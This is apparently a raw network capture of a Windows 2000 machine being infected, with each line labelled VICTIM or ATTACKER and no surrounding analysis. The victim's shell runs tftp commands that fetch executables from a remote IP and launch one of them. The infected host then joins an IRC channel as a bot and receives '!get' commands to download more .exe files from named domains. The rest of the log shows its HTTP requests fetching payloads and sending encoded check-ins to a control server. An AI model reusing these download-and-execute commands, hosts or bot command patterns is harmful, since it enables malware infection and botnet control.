VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
    C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\wins
    File Not Found
    C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\dllcache
    File Not Found
    C:\\WINNT\\system32>
VICTIM: tftp -i 70.182.94.31 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: tftp -i 70.182.94.31 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 2 seconds, 9984 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK apbatauh
    USER w020500 . . :-
VICTIM: Service Pack 2
    JOIN &virtu
ATTACKER: :u. PRIVMSG apbatauh :!get http:/ad.ghura.pl/rc.exe
    :u. PRIVMSG apbatauh :!get http:/bb.iwillhavebigdick.com/kp.exe
    :u. PRIVMSG apbatauh :!get http:/www.derquda.com/kb8.txt
VICTIM: GET /rc.exe HTTP/1.0
    User-Agent: Download
    Host: ad.ghura.pl
    Pragma: no-cache
ATTACKER: GET /kb8.txt HTTP/1.0
    User-Agent: Download
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/mno3.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/lmn2.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/klm1.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /ert/nop4.txt HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.derquda.com
    Pragma: no-cache
ATTACKER: GET /list.php?c=7E663DEA388E12BED83F7A52ECA9FB2A48D1E0DBCEEA55C97F4DB5FD218D241FF9C7D3CE691EAEC0750C4BD17C393E1CA8524EB9DCA522733246&v=2&t=0.6229822 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /upload/int.exe?t=0.1742517 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: anotherdomainname.in
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=A2BCD733B020EA7560904272BDF61ADA0B93CCF6BF9B77BF0A6CD098F22A5D77166BB1A780EF614C407CCBB9A29EE50236FFAA4209A9E9CAC2F67A0D7C03245693DCBF1AC21A54CB407A463CC22CD20D8A7D5C61E997696FE1433D50CC2668112A7BCFDE0F2FF659C07391168585A63CB94ECEE198DF4B6C6A331679EC5A0EB02D27EE463F12BE786158C7969452661D&t=0.8770105 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=5E4043A74DDD30AFF606083897DCC8080D95655FDBFF2FE781E74E068A521F35F18C7A6CD1BE29047D41186A754905E2CD04BE5601A127045561A2D5245B92E0D7980CA9558DF16E29130B71B856E43B38CF675A453B989E4DEFD8B527CD9AE38FDE75646242ED42C97A6FF9B94059D16E9BFFA1CF9C0736DACE9DE88C2E4BB1DBCB73DFC2F6C1007041114411D99B1BD132&t=1.629275E-02 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /1.exe?t=0.7933924 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 109.196.143.133
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=C2DCAC4851C167C6879FB79E661FCA0EB7295234496C3FF73E0E5226D07D577F3248FD197737AA86A1C6BFD64A40263E8C411EF90673A6833302F0597B02C6B493EECCBF34E0F6692E14BEC45AB4CE110AFD3F02D6A8A1A7FC5E6409B65C552C26775544D2F272DDBF0C0186AFAF78E212E5103FA3E47651CA9319763A8CD8666C6816BDD9EC8142251F1547A1601A67&t=0.5662195 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=FFE1D3375CCC62C361796148D9A0BB7F27B9E187280DA46C2D1DCCB8AD007D55A2D8A84CAAEA163A690EDAB3BDB72038BF72BC5BAADFE2C71F2EEF465B222D5F621FF28125F1920D2B11F48E4DA3D20D8275E7DACBB59690BF1DD6BB4EA46118AAFB786980A0C26DE05305938A73CE46798C4816DB88CDFFE7F3F683258734CE21313E95A99CD3170132A1F9B576502FEB30&t=0.9606287 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /tm/cry.exe?t=0.8272058 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: www.derquda.com
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=554BEA0EDF4F5586A14FA29320589651148EE781B9A6D7106C0DCE8977AE83A9F9B4B8A24A7497B8516631409C97AA4D448E18A6E1922A08137600A970D9E848DC92D77F9191D7485963C5BFD73910CFCA3D576AB0CE1A1C3092DDB03AD06910BCED10015878248B8734F97E05052BB183740E21E9AE597EB2EB9DF22A9C06B8969D6EC885B6D117E8D1A3F29D5A9CE3&t=0.9535486 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=031D977376E677A44AA438096B134F88E17B5D3B839CB572E2830443CE174B61F5B8859F5C62B49BC6F12E5F4F4454B3B77D2A943447587AD1B4A70E943DF757014F379FC5C5F76881BB770D06E872AD9463EFD2CBB5DADC76D43A5756BC3B4293C2677687A7C06FF7449E08F50C79F106F307593D6E5B696D79E7929A38897358480CA4B798D116E5D36C3EC1077A04&t=0.6925623 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: bestkind.ru
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /333.exe?t=0.5942957 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: star7.in
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu